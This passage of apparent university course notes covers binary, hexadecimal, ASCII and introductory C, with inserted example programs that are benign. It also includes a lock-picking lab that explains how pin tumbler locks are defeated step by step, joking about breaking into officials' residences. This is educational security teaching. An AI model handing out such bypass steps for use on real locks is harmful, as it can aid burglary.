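        "0000", "0001", "0010", "0011", "0100", "0101", "0110", "0111",
        "1000", "1001", "1010", "1011", "1100", "1101", "1110", "1111" };
    out[0] = '\0';
    for (; *hex; hex++) {
        const char *d = strchr(HEX_DIGITS, toupper((unsigned char)*hex));
        if (d == NULL) break;
        strcat(out, nibble[d - HEX_DIGITS]);
    }
    if (drop_leading) {
        char *p = out;
        while (p[0] == '0' && p[1] != '\0') p++;
        memmove(out, p, strlen(p) + 1);
    }
}

/* Binary -> hexadecimal (section 2.7): pad on the left to a multiple of four
   (the same as grouping from the right), then name each group of four bits. */
void bin_to_hex(const char *bin, char *out)
{
    size_t len = strlen(bin), pad = (4 - len % 4) % 4, i;
    unsigned group = 0;
    int n = 0;
    for (i = 0; i < pad + len; i++) {
        group = group * 2 + (i < pad ? 0u : (unsigned)(bin[i - pad] - '0'));
        if (i % 4 == 3) { out[n++] = HEX_DIGITS[group]; group = 0; }
    }
    out[n] = '\0';
}

int main(void)
{
    char buf[64];
    dec_to_bin(5, 8, buf);      printf("5 as a byte       = %s\n", buf);
    dec_to_bin(148, 0, buf);    printf("148 in binary     = %s\n", buf);
    printf("110110 in decimal = %u\n", bin_to_dec("110110"));
    printf("0x3CB in decimal  = %u\n", hex_to_dec("3CB"));
    dec_to_hex(746, buf);       printf("746 in hex        = 0x%s\n", buf);
    hex_to_bin("4DA9", 1, buf); printf("0x4DA9 in binary  = %s\n", buf);
    bin_to_hex("00000000000100101111111101111100", buf);
    printf("32-bit address    = 0x%s\n", buf);
    return 0;
}
```

Compile with gcc and run; main prints the worked examples from the text (5 as a byte, 746 as 2EA, 4DA9 in binary, and the 32-bit address of practice problem 1.7). The binary and hexadecimal routines work on strings rather than on machine integers on purpose: the point of the section is the positional method, and the string form makes the leading-zero rules of sections 2.2 and 2.6 visible.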
Consider the preceding example: Instead of saying “The item is at address 00000000000100101111111101111100”, we can say “The item is at address 0012FF7C.” In fact, for this course memory locations will always be 32-bit values represented in hexadecimal.

Practice Problem 1.8 Memory addresses are 32-bit values represented in hexadecimal.
(a) How many bytes are in a memory address?
(b) How many words are in a memory address?
(c) How many hexadecimal digits are in a memory address?

Solution:

So, now you should be comfortable going back and forth between binary, decimal and hex representations.

Remember: for any number, the representation in a given base can be determined by looking at the weights assigned to the position of each digit in the number. The number 111 is equal to one hundred eleven if it is intended to be a base 10 number. This same number—111—is equivalent to the base-10 value of seven if it is intended to be a binary number. This same number—111—is equivalent to the base-10 value of two hundred seventy three if it is intended to be a hexadecimal number.

Practice Problem 1.9 The picture below shows nine consecutive memory locations in RAM. The address of the first location shown is 0x08048374 and locations are numbered sequentially. The values stored at each address are also shown in hexadecimal. For example, memory address 0x08048374 holds the value 0x55.
(a) Fill in the memory addresses for the last four locations.
(b) How many bytes are stored at each individual memory address?

Solution:
(a)
(b)

3. Representation of Characters

Within a computer, positive integers are stored in four bytes by converting the integer to a binary number.² We now address the representation of characters, such as letters of the alphabet, punctuation signs and other assorted symbols (e.g., $, %, etc.). Characters are stored within the computer using the American Standard Code for Information Interchange code—the ASCII code—shown in the table below.
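As an added example (not from the notes) of the two representations just described: the 32-bit pattern of a positive integer with its leftmost bit zero, the 8-bit ASCII pattern of a character, and a dump of the individual bytes at sequential addresses in the style of practice problem 1.9. The base address 0x08048374 is borrowed from that problem purely as a constructed label, and the function names are the example's own. The dump also shows a point the notes' "leftmost bit" wording leaves out: on x86 the byte at the lowest address holds the least significant byte of the integer (little-endian order), so the byte containing the sign bit is the last of the four in memory.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example for section 3 and footnote 2 (not the notes' own code). */

/* 32-bit pattern of an integer, most significant bit on the left. For a
   positive value the leftmost bit is 0, as footnote 2 states. */
void int_bits(int32_t v, char out[33])
{
    uint32_t u = (uint32_t)v;
    for (int i = 0; i < 32; i++)
        out[i] = ((u >> (31 - i)) & 1u) ? '1' : '0';
    out[32] = '\0';
}

/* 8-bit pattern of the single byte holding a character: its ASCII code. */
void char_bits(char c, char out[9])
{
    unsigned char u = (unsigned char)c;
    for (int i = 0; i < 8; i++)
        out[i] = ((u >> (7 - i)) & 1u) ? '1' : '0';
    out[8] = '\0';
}

/* The i-th byte of any object exactly as it sits in memory. */
unsigned char byte_at(const void *obj, size_t i)
{
    return ((const unsigned char *)obj)[i];
}

/* 1 when the byte at the lowest address holds the least significant byte
   of a multi-byte integer (little-endian, as on x86); 0 otherwise. */
int is_little_endian(void)
{
    uint32_t probe = 0x01020304u;
    return byte_at(&probe, 0) == 0x04;
}

/* Print n consecutive bytes the way practice problem 1.9 pictures RAM: one
   byte per address, 32-bit addresses numbered sequentially. The base address
   is a constructed label taken from that problem, not the object's real
   address (which would not fit in 8 hex digits on a 64-bit machine). */
void dump_like_notes(const void *obj, size_t n, uint32_t base)
{
    for (size_t i = 0; i < n; i++)
        printf("0x%08X : 0x%02X\n", base + (uint32_t)i, byte_at(obj, i));
}

int main(void)
{
    char bits[33];
    int32_t x = 5;

    int_bits(x, bits);
    printf("int 5 as 32 bits       : %s\n", bits);
    char_bits('?', bits);
    printf("'?' = 0x%02X as 8 bits  : %s\n", (unsigned char)'?', bits);

    puts("the four bytes of int 5 in memory:");
    dump_like_notes(&x, sizeof x, 0x08048374u);
    printf("(little-endian machine: %s)\n", is_little_endian() ? "yes" : "no");

    puts("the bytes of the characters \"USNA\" in memory:");
    dump_like_notes("USNA", 4, 0x08048378u);
    return 0;
}
```

The character dump needs no endianness caveat: each character occupies exactly one byte, so the bytes appear in memory in the same order as the letters. Only multi-byte integers are affected by byte order, which is why the program tests for it at run time instead of assuming it.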
Each ASCII symbol is shown with both its hexadecimal representation and its base-10 representation. Suppose we wanted to know how the symbol for the question mark is stored internally within the computer. Scanning the table for the question mark, we locate it at the bottom of the second column, and we note that its hexadecimal value is 3F. Converting this hexadecimal value to binary, we conclude that the question mark is stored as 00111111.

Practice Problem 1.10 How is the letter t stored in memory?

Solution:

2 The right-most 31 bits are used. The leftmost bit is set to zero (indicating a positive integer).

Practice Problem 1.11 Consider again the picture shown in practice problem 1.9. Suppose you know that a character is stored at memory location 0x08048374. What is stored at this memory location?

Solution:

Reading

Read Appendix 1, Basic Linux Commands.

Problems

Problem 1. Why do computers use binary?

Problem 2. Main memory is much faster than secondary memory. Why don't we use main memory for all of our memory storage needs? In other words, why bother using secondary memory?

Problem 3. Secondary memory is non-volatile while main memory is volatile. Since it is better to have data be nonvolatile, why don't we use secondary memory for all of our memory storage needs?

Problem 4.
(a) When you first boot up your computer (no user programs running), where is the Microsoft PowerPoint program stored?
(b) Where are these instructions copied to in order for you to compose a presentation using Microsoft PowerPoint?
(c) Where is the Microsoft PowerPoint program stored after you turn off your computer?

Problem 5. True or false: Running programs are stored in the CPU.

Problem 6. You type up a document in MSWORD, give it a file name, save it to your ‘My Documents’ folder, and power down your computer. Where is the file you created now stored?

Problem 7. What important piece of software controls the computer's hardware and software resources?

Problem 8.
Consider a quantity of 9216 bits.
(a) How many bytes does this amount to?
(b) How many words does this amount to?
(c) How many KB does this amount to?

Problem 9. Express the binary number 100000 as a decimal number.

Problem 10. Convert the binary number 10101 to decimal.

Problem 11. Express the binary number 01110101 as a decimal number.

Problem 12. Express the binary number 00101110 as a decimal number.

Problem 13. Convert the decimal number 78 to binary.

Problem 14. Convert the decimal number 43 to binary.

Problem 15. Convert the decimal number 223 to binary.

Problem 16. Express the hexadecimal number 27 as a decimal number.

Problem 17. Express the hexadecimal number BEE as a decimal number.

Problem 18. Convert the hexadecimal number 100 to binary.

Problem 19. Convert the hexadecimal number F1E to binary.

Problem 20. Convert the binary number 101110011011 to hexadecimal.

Problem 21. Suppose you are told that an item is at 32-bit address C356A20C. What is the value of the fourth bit in this address, counting from the left?

Problem 22. Item A requires four bytes of storage and is located at address 0x00000071. Item B requires four bytes of storage and is located in memory right before (i.e., at a lower memory address than) Item A. Item C requires 2 bytes of memory and is located in memory right before item B. What is Item C's address?

Problem 23. How is the letter k stored in memory in binary?

Problem 24. How is the letter g stored in memory in hexadecimal notation?

Problem 25. What is the hexadecimal number that results from the calculation: 0x138 + 0x6

Problem 26. What is the hexadecimal number that results from the calculation: 0x683 + 0x251

Problem 27. What is the hexadecimal number that results from the calculation: 0x2A6 + 0xE97

Problem 28. Consider the picture of main memory (RAM) shown below. The address of the first item is 0x0804839C, and addresses are numbered sequentially.
(a) Label the figure showing the addresses for the next eight memory locations.
(b) List the four preceding memory addresses.
(c) If the items stored in the first five memory locations are characters, what is stored in this portion of memory?

Problem 29. Consider the memory address $730_{10}$. By hand calculation, express this memory address in hexadecimal notation, using a number of hex digits appropriate for our 32-bit architecture.

Security Exercise 1

Part 1: Why Pick Locks in a Cyber Security Class?

Many hacking conferences, such as the annual DEFCON Conference, have a room set aside for attendees to practice lock picking. If you think about it, hacking is a lot like lock picking!

Hacking a computer is like solving a puzzle. Picking a lock is like solving a puzzle.

Hacking potentially involves breaking into an area that you are not supposed to have access to. Picking a lock potentially involves breaking into an area that you are not supposed to have access to.

Hacking a computer often involves exploiting a defect. Picking a lock often involves exploiting a defect.

We don’t have to hack into a person’s computer to gain the desired outcome. We could, for instance, take the user hostage at gunpoint and force them to surrender their password. But, by surreptitiously hacking in, we can gain the desired outcome with the owner remaining unaware. We don’t have to pick a lock to a person’s front door to gain the desired outcome; we could, for instance, kick in their front door. But, by surreptitiously picking the lock, we can gain the desired outcome with the owner remaining unaware.

Learning to hack takes practice. You can’t learn hacking just from lecture—you have to get your hands dirty. Learning to pick locks takes practice. You can’t learn to pick locks just from lecture—you have to get your hands dirty.

By learning to hack you can see how hackers defeat computer security mechanisms, and this can lead you to design more secure computer systems.
By learning to pick a lock you can see how burglars defeat security mechanisms, and this can lead you to design more secure locks.

If you decide to pursue lock picking as a hobby, note that some states do not even allow possession of lock picking tools. In the states of Mississippi, Nevada, Ohio and Virginia, simple possession of lock picking tools is taken as prima facie evidence that you intend to commit a crime. In every state, picking a lock without the lock-owner’s permission is a crime. In some countries it is illegal to even possess lock picking tools of the type you will use in lab today. For example, merely possessing lock picking tools in Japan carries a sentence of one year imprisonment. Likewise, in Australia and Poland, mere possession of lock picking tools is punishable with arrest. Hungary goes so far as to classify lock picks as military weapons and only the armed forces may possess them.

In this lab, you will work in teams of four midshipmen to pick mechanical door locks.

Part 2: The Pin Tumbler Lock

Let’s examine this figure from The MIT Guide to Lock Picking³:

  (Figure: pin tumbler lock with no key inserted; labels: Hull, Plug)

3 Unless otherwise noted, all figures are from The MIT Guide to Lock Picking, Copyright 1991 by Theodore Tool. All rights reserved. The author permits reproduction of the document on a non-profit basis provided that this copyright and distribution notice is included. The information in The MIT Guide to Lock Picking is provided for educational purposes only.

This picture shows a pin tumbler lock with no key inserted. Note the primary components:

  The hull is stationary.
  The cylindrical plug can rotate when the correct key is inserted into the plug.
  The lock has pins. In the picture above, the lock has 5 pins. The pin closest to where the key goes in is labeled pin 1. The pins are in holes that pass through both the hull and the plug.
Each individual pin has three components:

  A key pin
  A driver pin
  A spring

The key pin and driver pin are distinct components, but they are forced tightly together by the spring. A protrusion on the plug (not shown) prevents the spring from pushing the pins completely out of the plug.

Note that in the picture above (with no key inserted) the plug cannot rotate. The reason: The driver pins are protruding between the plug and hull, preventing rotation. The picture below more clearly shows the driver pin preventing rotation of the plug.

When a key is inserted, the key pushes the key pin up, which pushes the driver pin up (working against the spring). If the key raises all the pins to precisely the point where the break between each key pin and driver pin is on the shear line, the plug will be free to rotate. This scenario is shown below.

Thus, the intent is to prevent the plug from moving unless the proper key is inserted. The proper key will lift each key pin to the point where the break between the key pin and driver pin lines up with the shear line between the plug and the hull.

So… you might be seeing what is involved in lock picking… you have to use a tool to lift pins up so that breaks between the key pins and driver pins line up with the shear line between the plug and hull. And you might be wondering… How do we lift all those pins at the same time? The answer is: You don’t lift all the pins at the same time. You lift the pins one at a time!

To pick a lock, you provide a small amount of force to attempt to turn the plug. The plug won’t turn of course, but the hope is that one of the drivers will be wedged between the plug and hull (with the other drivers still somewhat loose). In other words, the hope is that one pin will bind. Then, you use a pick to gently move this driver up to the point where the gap between this particular key pin and driver pin lines up with the shear line between the plug and hull.
At this point, the plug will rotate slightly, causing a different pin to be the one that is wedged between the plug and hull. So, to pick a lock, you:

  Apply a gentle force to turn the plug using a tension rod.
  Using a pick, try to determine which pin is binding.
  Gently and slowly push that pin up until you feel it reach the shear line. This will cause the plug to move slightly. We say that this pin is now set, with the driver pin trapped in the hull above the shear line.
  Rinse and repeat

A short video at the link below illustrates the idea (but keep in mind that the order that pins bind might not be as shown!): http://www.youtube.com/watch?v=v9hhBJHfwJE

Note the critical flaw that makes lock picking possible: Due to limitations in manufacturing tolerances, only one pin at a time will bind!

Part 3: Let’s Pick Locks

We will use a Southord Locksmith Progressive Lock Picking System to learn how to pick locks. The kit comes with five locks, creatively given the numbers one through five. Lock number one is an exact replica of the lock to your Instructor’s residence. The lock has a single pin. The second lock, an exact replica of the lock to the EC310 Course Coordinator’s residence, has two pins. Therefore this lock is slightly more difficult to pick than lock one. Lock three, with three pins, is a replica of the lock to the Department Chair’s residence. Lock four (four pins) is a replica of the lock to the Dant’s residence and picking lock five (five pins) would mean you could gain access to (gasp!) the Buchanan House.

Each kit comes with four different picks and one tension rod. It is recommended that you use just the “hook feeler pick” and the tension rod:

  (Figure: Hook Feeler Pick, Tension Rod)

Your assignment: To complete this lab, you must show the ability to break into your Instructor’s residence and the EC310 Course Coordinator’s residence. To gain extra credit, you must break into the Department Chair’s residence.
Show your instructor or lab technician your successful picking of each lock.

__________ Lock 1
__________ Lock 2
__________ Lock 3 (Extra Credit)

We would give you extra credit if you were to break into the Dant’s residence or the Buchanan House, but we realize that this far surpasses your meager abilities (hmm… sounds like a dare!).

Security Exercise 1 Answer Sheet

Have your instructor sign for picking Locks 1, 2 and 3 below.

__________ Lock 1
__________ Lock 2
__________ Lock 3 (Extra Credit)

Although it exceeds your meager abilities, for "completeness", we include signature blocks for Locks 4 and 5.

__________ Lock 4 (Mega Extra Credit)
__________ Lock 5 (Super-duper bonus points)

Chapter 2: C Programs

Objectives:
a) Explain the distinction between machine language, assembly language and programs written in a high-level language.
b) Demonstrate the ability to analyze simple C programs that perform keyboard input, screen output and simple arithmetic.
c) Demonstrate the ability to create, edit, compile and execute C programs in a Linux environment.
d) Explain how integers and characters are stored and encoded in memory.

1. Machine Languages and High Level Languages

1.1. Machine Language

Computers can only “understand” ones and zeroes. Everything is bits! When introducing yourself, try this: “Hey, there are 10 kinds of people in the world, those that speak binary and those that don’t. Which are you?” Ha ha ha ha!!! Works every time!

But…it gets worse! In addition to only speaking in ones and zeroes, computers can only interpret very simple instructions that have been “hardwired” as electronic circuits on the CPU chip. This set of simple hardwired instructions is termed the “instruction set,” and is established by the CPU manufacturer. Let’s examine something as simple as adding two integers together.
Computers can add two integers together because there is an electronic circuit that works as follows: if you place a value on each of the two inputs to the circuit, the sum of the two values will be placed on the output of the circuit. You should accept that such a circuit is easy to build—some of your fellow midshipmen build these circuits in their classes, depending on their major. Let’s say we have this addition circuit sitting on a table in front of us. How do we get it to actually perform addition? Simply yelling at the circuit: “ADD TWO NUMBERS!” will not work (though many have tried). The solution, circa 1950: Run jumper cables! If we wanted to add an integer stored at a location (let’s call the location A) to a second integer stored at another location (let’s call this second location B), we would have to run cables from A and B to the first and second inputs of the addition circuit. If we wanted to store the resulting sum at location C, we would have to run a jumper cable from the output of the addition circuit to location C. From the dawn of computers (mid-1940’s) to the early 1950’s, programming a computer consisted of running frantically around a room, connecting and disconnecting cables from various locations on the large (room-size) computer for each calculation that had to be performed. This was arduous physical activity, and computer operation was very slow (but, on the bright side, computer programmers tended to be physically fit). Computers were slowed down by humans. The human operators might need five minutes to connect all the cables for a calculation that the circuit—once wired up—would then accomplish in five microseconds. So, the critical question arose: How can we “communicate” with the computer to instruct it to perform complex tasks while sitting at our desk? 
[Figure: Early Programmers Hard at Work on the ENIAC (US Army Research Lab)]

The solution: The circuit for each instruction in the CPU’s instruction set (for example, our addition circuit) is associated with a unique bit string that the CPU can interpret. For example, it may be the case that if this bit string is set to 00100011, our addition circuit will be used. If this bit string is set to a different value, say 11001000, the circuit that does a different instruction (perhaps the comparison circuit that determines if the first input is larger than the second input) will be invoked. Moreover, all of the required bit strings (needed to do whatever it was we needed to do) were placed in the computer's main memory at the outset. This stored set of instructions, a program, replaced the need for jumper cables.

So, to write a program, the programmer must determine which operations from the instruction set he wishes the CPU to carry out, then determine the unique bit strings corresponding to these instructions. These instructions (i.e., this program) are then placed in memory, and the CPU executes one instruction after another.

An example should clarify. Suppose we have again our two integers A and B and we want to calculate the sum as C = A + B. Using instructions from the CPU’s instruction set, the program to accomplish this might look something like Program 1, shown below on the left (with corresponding explanations shown on the right):

    Program 1     What it means to the computer
    00010000      load into the CPU the integer…
    00000111      …which we are calling A.
    00100011      Add to this…
    00001111      …what we are calling B.
    00010001      Now place this result…
    00000100      …in the place we are calling C. [4]

This program is written in machine language, language that the computer can actually follow. Most early programs were written this way. Since machine language is defined by the hardware (the CPU’s instruction set), machine language is machine-dependent.

[4] The experienced programmer would recognize that the quantities A, B, C and D would actually be register values or the addresses of the variables. This simple example is not meant to be technically rigorous, and is certainly not intended to represent any actual machine language standard.

1.2. Assembly Language (“Low Level Language”)

Machine language programming was tedious, time-consuming, prone to error, cumbersome, and generally awful. Imagine having to write a program like Program 1 above just to add two integers. But, machine language programs are the only kind of programs that the CPU can understand.

To make programming easier for humans, the machine instructions were replaced by “English-like” words, while decimal numbers and symbols replaced strings of bits. The new languages, using English-like wording, were called assembly languages. Using assembly language, if we wanted to perform, say, addition, then instead of using the code 00100011, which is the appropriate machine language code from our prior example, we would instead use the corresponding assembly language instruction ADD. Program 1 on the previous page might appear as Program 2 below, written in assembly language.

    Program 2
    LOAD A
    ADD B
    STORE C

Computers don’t understand assembly language; computers only understand machine language. So, before a computer can execute an assembly language program, it must be converted to machine language. An assembler is the software that translates an assembly language program into a machine language program. Because of the nearly one-to-one correspondence between assembly language symbols and instructions in the instruction set, assembly language programs execute very efficiently.

1.3. High Level Languages

Assembly language programming is still not enjoyable. For one thing, it takes time to write programs in assembly language because simple tasks take many lines of code.
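As an added illustration (not from the notes), here is a toy CPU in C that holds Program 1's bit strings in memory and executes them, plus a tiny assembler that produces those bits from Program 2's mnemonics. The opcodes 00010000, 00100011 and 00010001 and the addresses 7, 15 and 4 for A, B and C are taken from the Program 1 table above; two-byte instructions, a 16-byte memory, a single accumulator and the program's placement at cell 8 are assumptions of this example, which, like the notes' table, represents no real machine.

```c
/* Added example (not from the EC310 notes): a toy stored-program CPU that
 * runs Program 1, and an assembler that turns Program 2 into Program 1.
 * Assumptions of this example (not in the notes): every instruction is two
 * bytes, an opcode followed by a memory address; memory is 16 one-byte
 * cells; the CPU has a single accumulator; the program is placed at cell 8
 * so that it does not overlap the data cells A=7, B=15, C=4. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define MEM_SIZE 16

/* Opcodes from the notes' Program 1 table (constructed, not a real ISA). */
enum { OP_LOAD  = 0x10,   /* 00010000 */
       OP_ADD   = 0x23,   /* 00100011 */
       OP_STORE = 0x11 }; /* 00010001 */

/* Operand addresses from Program 1: A is cell 7, B is cell 15, C is cell 4. */
enum { ADDR_A = 7, ADDR_B = 15, ADDR_C = 4, PROGRAM_START = 8 };

/* Render one byte as the eight-character bit string printed in the notes. */
void byte_to_bits(uint8_t value, char out[9])
{
    for (int i = 0; i < 8; i++)
        out[i] = (value & (0x80u >> i)) ? '1' : '0';
    out[8] = '\0';
}

/* The assembler's job: map a Program 2 mnemonic to its opcode, or -1. */
int assemble_mnemonic(const char *mnemonic)
{
    if (strcmp(mnemonic, "LOAD") == 0)  return OP_LOAD;
    if (strcmp(mnemonic, "ADD") == 0)   return OP_ADD;
    if (strcmp(mnemonic, "STORE") == 0) return OP_STORE;
    return -1;   /* not in the instruction set */
}

/* Assemble Program 2 (LOAD A / ADD B / STORE C) into mem at PROGRAM_START.
 * Returns the number of bytes written, or -1 if a mnemonic is unknown. */
int assemble_program2(uint8_t mem[MEM_SIZE])
{
    const char *mnemonics[3] = { "LOAD", "ADD", "STORE" };
    const uint8_t operands[3] = { ADDR_A, ADDR_B, ADDR_C };
    int pc = PROGRAM_START;
    for (int i = 0; i < 3; i++) {
        int opcode = assemble_mnemonic(mnemonics[i]);
        if (opcode < 0) return -1;
        mem[pc++] = (uint8_t)opcode;   /* the bit string that selects the circuit */
        mem[pc++] = operands[i];       /* the address it works on */
    }
    return pc - PROGRAM_START;         /* 6 bytes, as in Program 1 */
}

/* Fetch-decode-execute: run `count` two-byte instructions starting at pc.
 * The same memory holds both the program and its data, which is what
 * "stored program" means. Returns the number of instructions executed,
 * or -1 on an opcode with no circuit behind it. */
int run(uint8_t mem[MEM_SIZE], int pc, int count)
{
    int acc = 0;                       /* the CPU's single register */
    for (int i = 0; i < count; i++, pc += 2) {
        uint8_t opcode = mem[pc % MEM_SIZE];
        uint8_t addr = mem[(pc + 1) % MEM_SIZE] % MEM_SIZE; /* stay in bounds */
        switch (opcode) {
        case OP_LOAD:  acc = mem[addr];           break;
        case OP_ADD:   acc += mem[addr];          break;
        case OP_STORE: mem[addr] = (uint8_t)acc;  break;
        default:       return -1;
        }
    }
    return count;
}

/* Put a and b in cells A and B, assemble and run Program 2, return C.
 * Cells are one byte, so sums of 256 or more wrap around (toy limitation). */
int add_with_toy_cpu(uint8_t a, uint8_t b)
{
    uint8_t mem[MEM_SIZE] = { 0 };
    mem[ADDR_A] = a;
    mem[ADDR_B] = b;
    if (assemble_program2(mem) != 6) return -1;
    if (run(mem, PROGRAM_START, 3) != 3) return -1;
    return mem[ADDR_C];
}

int main(void)
{
    uint8_t mem[MEM_SIZE] = { 0 };
    char bits[9];
    int len = assemble_program2(mem);
    /* Print the assembled bytes: this is Program 1 as the CPU sees it. */
    for (int i = 0; i < len; i++) {
        byte_to_bits(mem[PROGRAM_START + i], bits);
        printf("%s\n", bits);
    }
    printf("3 + 4 = %d\n", add_with_toy_cpu(3, 4));
    return 0;
}
```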
There is generally one assembly language symbol (e.g., “ADD”) for each instruction in the instruction set. Writing programs in assembly language is not fun, and if there is anything that electrical engineering is about, it’s having fun. High-level languages were developed to allow programmers to write programs that are closer to natural English. In a high level language, Program 1 on the prior page might simply be:

    Program 3
    C = A + B

A single high-level language statement is usually equivalent to many, many instructions in the CPU instruction set (and therefore also equivalent to many, many assembly language instructions). A program written in a high-level language is called a source program (or source code). Again, since computers only understand machine language, a program written in a high-level language must be translated into machine language. A compiler is the software that translates high-level language into machine language.

[Figure: High level language program → Compiler → Machine language program]

All compilers convert high-level language programs to machine language programs, but, in addition, some compilers will also provide a listing of the assembly language code that corresponds to the machine language. This often proves very useful, as we shall see.

1.4. Program Development

In this course you will gain some familiarity with the C high-level language. C works at a lower level (“closer” to the hardware) than do other languages, such as Java. With C, we can gain a finer control over what the computer is actually doing.

The C language is approximately four decades old. In 1970, at AT&T’s Bell Labs, engineers Ken Thompson and Dennis Ritchie wanted to write an operating system to support a computer game they had written (Space Travel). They wanted to write the operating system in a high-level language (prior to this, operating systems were written in assembly language).
Finding no high-level languages satisfactory, they started with an existing language named BCPL as a base, and designed a new language, subsequently named B. The language was further improved and renamed C. This is the C language we have today. Having developed the C programming language, they returned to their task of writing an operating system in C. This operating system was UNIX. So, yes, the love that computer engineers have for video games led to the development of the C language and the UNIX operating system. Here is a screenshot from the game Space Travel, to give you an idea of what computer geeks were salivating over back in 1970:

[Figure: screenshot of the game Space Travel]

Now that we have discussed machine language and high-level languages, it is worthwhile to briefly cover the mechanics of using the C high-level language. You will enter your program by typing your C source code using a text editor (which—from a text entry point of view—you should find similar to using a program such as Notepad). As previously mentioned, you will then send your program to a compiler, which will translate your program into the machine language that the computer can understand. You will then “run” (i.e., execute) your program. So… we have three basic steps: Edit, Compile, Execute.

[Figure: Your brains and hands → Editor (used to type in the program) → C program → Compiler → Machine language program (the final executable program)]

It should be emphasized once again: It is only the machine language program that is actually executed on the computer.

2. The Basics of C

Why learn to program in C? Who uses C programs? You do! Here are some programs written in C (and its child, C++):

- MSWORD
- Acrobat Reader
- PowerPoint
- Firefox
- All Windows operating systems
- Most games

In fact, despite what those CS kids might tell you, most programmers today are programming in C! The chart below shows the relative popularity of programming languages over the years.
C and Java have been battling for the title of "#1 Programming Language" over the past years; C was the top language in 2013 and 2014; Java won the title (barely) in early 2015.

[Figure: TIOBE index chart. From TIOBE: The TIOBE Programming Community index is an indicator of the popularity of programming languages. The ratings are based on the number of skilled engineers world-wide, courses and third party vendors.]

It is quite fair for the busy midshipman to ask: "Why do I have to have basic familiarity with C programs?" The answer: The only way you can truly gain an appreciation for the damage that computer programs can do to your host computer is to learn a little computer programming. And since most programs are written in C (or its child C++), that’s a logical choice for us to pursue. To quote your textbook author: “An understanding of programming is a prerequisite to understanding how programs can be exploited.”

2.1. Program Layout

Program Layout. Simple C programs have the following layout:

    #include<stdio.h>
    int main( )
    {
        our simple program
    }

The lines before our program are a complicated way of saying: "This is the start of the program." The closing brace says: “This is the end of the program.”

Our simple program will consist of two parts: We first tell the computer the names of the variables we are going to use and the type of information they will hold. This part of the program is called the variable declarations. As we’ll see, we have to tell the C compiler about all the variables we intend to use in our program. The second part tells the computer to do something with our variables. These individual instructions are called statements. So, our program layout can be further refined:

    #include <stdio.h>
    int main( )
    {
        variable declarations
        statement 1;
        statement 2;
        (etc., etc.)
        statement n;
    }

Spacing. We can use our own choice for line spacing and indentation.
Specifically, we can have multiple blank lines between statements, we can indent each line as much as we like, we can place any amount of space between different words, etc. As a general rule, you should use line spacing and indentation to make programs easy to read. To enhance readability, place each statement on its own line (unless it won’t fit).

The Semi-colon. Each statement is an instruction which is followed by the computer. Each executable statement is ended with a semi-colon. Put another way, a semi-colon marks the end of an executable statement.

Syntax. The syntax of C is the set of rules for constructing correct statements. That is to say, the grammar rules of the programming language are referred to as the syntax. For example, ending each statement with a semi-colon is a grammar rule—part of the syntax. If we violate a grammar rule, it is said that we have made a syntax error. For example, if we don't include a semi-colon where necessary, or if we leave off a program’s closing brace, we have made a syntax error. The compiler will detect syntax errors.

Comments. We can insert comments into programs in order to help other people (and ourselves!) understand the program. Comments are ignored by the compiler. No machine language is generated by comments. To insert a comment, use two consecutive slashes ( // ) with no space between them. The comment will begin immediately following the two slashes and run to the end of that line. Consider this example:

    #include <stdio.h>
    int main( )
    {
        int length = 6, width = 5, height = 2; //Look at me!
        // Random comment, just thrown in to show you a comment.
    }

2.2. Variables

A variable is a location in computer memory where data can be stored; that is, a variable holds data, for instance a number or a character. The data held in a variable is called its value.

Identifiers. We give each variable a name. We can imagine that the memory location for our variable is actually labeled with the variable’s name.
For example, if we have a variable named age that holds the value 50, we can "imagine" that in main memory my variable is held in a box labeled "age":

    age
    +----+
    | 50 |
    +----+

Of course, in actuality, my variable is stored at a specific memory address (and is stored in binary). The programmer is free to choose the names of his variables subject to only a few constraints: A variable name must start with a letter. All other characters in the variable’s name must be letters, numbers or the underscore symbol. So, m171234 could be chosen as a variable name, but 171234 or m-171234 could not be variable names (in the first case, the faulty name starts with a number; in the second case the faulty name has a hyphen as one of its characters).

Variable Declarations. Every variable must be declared before it can be used. When you declare a variable, you tell the computer the variable’s name (i.e., its identifier), and what kind of data you are storing in the variable. The compiler reserves a location in memory to hold the variable’s value. The kind of data that a variable holds is called the variable’s type. More on this in a moment, but, first, the syntax of a variable declaration is:

    type variable_name_1, variable_name_2, ... , variable_name_x ;

Note that when you declare more than one variable of the same type in a declaration, a comma is used to separate the variable names. Also notice that a variable declaration ends with a semicolon.

Variable Types. When you declare a variable, you must tell the computer the variable's type, i.e., the kind of data the variable will be holding. For now, our choices for type are:

    Kind of data                          type    Amount of space reserved to hold the variable
    Integer (e.g., 1, -5, 39)             int     stored in 4 bytes
    Real Numbers (e.g., 2.35, -9.9)       float   stored in 4 bytes
    A single character (e.g., A, $, b)    char    stored in 1 byte

Notice that integers are always stored as four bytes.
So, for example, the integer value 2 is represented in binary as 10 and would be stored as the four-byte quantity:

    00000000 00000000 00000000 00000010

Examples of Declarations. If we wanted to declare a variable that would hold someone's age as an integer, we would use

    int someone_age;

If we wanted to declare two variables that would store a midshipman's status as a single character (e.g., P for Plebe, Y for Youngster, S for Sleeper, F for Firstie), we would use

    char mid1, mid2 ;

Why do we need to declare variables? Consider the following series of 1’s and 0’s stored in memory: 01000001. This set of 1’s and 0’s can be:

- the character A in ASCII
- the integer 65 (under the presumption that the three preceding bytes are all zeros, since integers use four bytes)
- some real number

Which is it? There is no way of knowing, unless we tell the compiler up-front the type of data the variable is intended to hold. If we tell the compiler the aforementioned value (01000001) is the value of a variable of type char, the compiler will interpret the value as the character A. If, on the other hand, we specify that this is the value of a variable of type int, the compiler will interpret the value as the integer 65. By declaring a variable we tell the computer how much memory to use for the variable and what code to use when converting the variable’s value to and from a binary string.

2.3 Data Representation.

Positive integers are stored in four bytes by converting the integer to a binary number. The rightmost 31 bits are used. The leftmost bit is set to zero (indicating a positive number). We will not be concerned with negative integers in this course, but you should be aware that they are also stored in four bytes and the leftmost bit will be a one. Variables of type char are stored in one byte using the ASCII code. The ASCII table from the previous chapter is repeated below.

2.4 Initializing Variables.

All variables always have some value.
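To make the storage rules of section 2.3 concrete, here is an added example (not from the notes) that prints the four-byte pattern of an int exactly as written above, shows the sign bit, and reads the same byte 01000001 once as the character A and once as the integer 65. It assumes a 4-byte int and 8-bit bytes, the convention of these notes; the byte-order check at the end is a caveat the notes do not cover.

```c
/* Added example (not from the EC310 notes): how an int and a char are laid
 * out in memory, and why the same bits mean different things under
 * different declared types. Assumes a 4-byte int and 8-bit bytes. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

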